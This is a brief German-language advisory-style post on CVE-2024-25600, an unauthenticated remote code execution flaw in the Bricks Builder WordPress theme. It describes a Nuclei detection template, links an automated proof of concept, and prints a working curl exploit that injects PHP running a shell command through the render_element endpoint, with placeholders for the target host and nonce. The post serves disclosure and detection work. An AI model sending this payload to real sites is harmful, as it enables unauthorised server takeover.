
Nuclei-Template und Informationen zum POC für CVE-2024-25600
Nuclei-Vorlage und Informationen über den POC für CVE-2024-25600
Das Bricks-Theme für WordPress ist in allen Versionen bis einschließlich 1.9.6 anfällig für Remote Code Execution. Dies ermöglicht es nicht authentifizierten Angreifern, Code auf dem Server auszuführen. Diese Vorlage 🛠️ wurde entwickelt, um die CVE-2024-25600-Schwachstelle 🕳️ zu erkennen, die im Bricks Builder Plugin für WordPress mit nuclei gefunden wurde. Die Schwachstelle ermöglicht nicht authentifizierte Remote-Code-Ausführung auf betroffenen Websites 💻.
Der vollständige POC (automatisch) ist verfügbar unter https://github.com/chocapikk/CVE-2024-25600.
Der grundlegende PoC aus der Offenlegung ist wie folgt:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
Ersetzen Sie [HOST] durch die Zielwebsite und [NONCE] durch den Nonce-Wert, der von der Site abgerufen wurde.
Weitere Informationen zur CVE-2024-25600-Schwachstelle finden Sie in der detaillierten Offenlegung unter Snicco.io.